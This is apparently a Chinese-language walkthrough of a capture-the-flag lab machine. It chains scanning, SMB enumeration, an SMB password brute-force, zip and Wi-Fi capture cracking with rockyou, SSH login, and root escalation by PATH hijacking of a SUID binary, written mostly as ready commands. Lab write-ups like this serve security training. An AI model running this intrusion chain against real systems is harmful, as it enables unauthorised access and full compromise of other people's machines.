主機發現
1 netdiscover -i eth0 -r 192.168.170.0/24
埠掃描
1 nmap -sV 192.168.170.145
訪問80埠,提示使用smb攻擊
目錄掃描,未發現有價值的資訊
1 dirb http://192.168.170.145/
SMB滲透
SMB是一個網路協議名,它能被用於Web連線和客戶端與伺服器之間的資訊溝通,允許應用程式和終端使用者從遠端的檔案伺服器訪問檔案資源
查詢靶機中的使用者
1 enum4linux -U 192.168.170.145
enum4linux是用於列舉系統上的SMB服務的工具,可以輕鬆的從與SMB服務有關的目標中快速提取資訊
爆破smb使用者的密碼,密碼為空
1 acccheck -t 192.168.170.145 -u smb -v
列舉靶機的共享資源
1 smbmap -u 'smb' -p '' -H 192.168.170.145
檢視靶機的共享目錄
1 smbclient -L 192.168.170.145 -U smb
透過SMB登入靶機
1 smbclient //192.168.170.145/print$ -U smb
發現檔案全是0位元組,但是還有一個.目錄,嘗試進入
1 smbclient //192.168.170.145/smb -U smb
下載main.txt檢視內容,無有用資訊
1 get main.txt
下載safe.zip進行解壓
1 get safe.zip
發現需要密碼,破解得到密碼為hacker1
1 fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u safe.zip
解壓得到兩個檔案,secret.jpg和user.cap,開啟圖片未發現有用資訊,然後開啟流量包發現是個無線資料包,wifi名稱為blackjax
使用aircrack-ng破解user.cap檔案,得到密碼為snowflake
1 aircrack-ng -w /usr/share/wordlists/rockyou.txt user.cap
登入ssh,得到第一個flag
1 ssh blackjax@192.168.170.145 -p 2525
發現該使用者不能執行sudo
檢視系統中帶SUID的程式
1 find / -user root -perm -4000 -print 2>/dev/null
執行netscan命令
下載並分析該檔案,發現它呼叫了execve函式執行了netstat -antp命令
1 scp -P 2525 blackjax@192.168.170.145:/usr/bin/netscan /tmp 2 strace -f /tmp/netscan
透過劫持環境變數來讓netscan在執行時執行其他命令
1 #tmp有寫許可權 2 echo "/bin/sh" > /tmp/netstat 3 chmod 777 /tmp/netstat 4 export PATH=/tmp:$PATH 5 netscan
成功提權,得到第二個flag
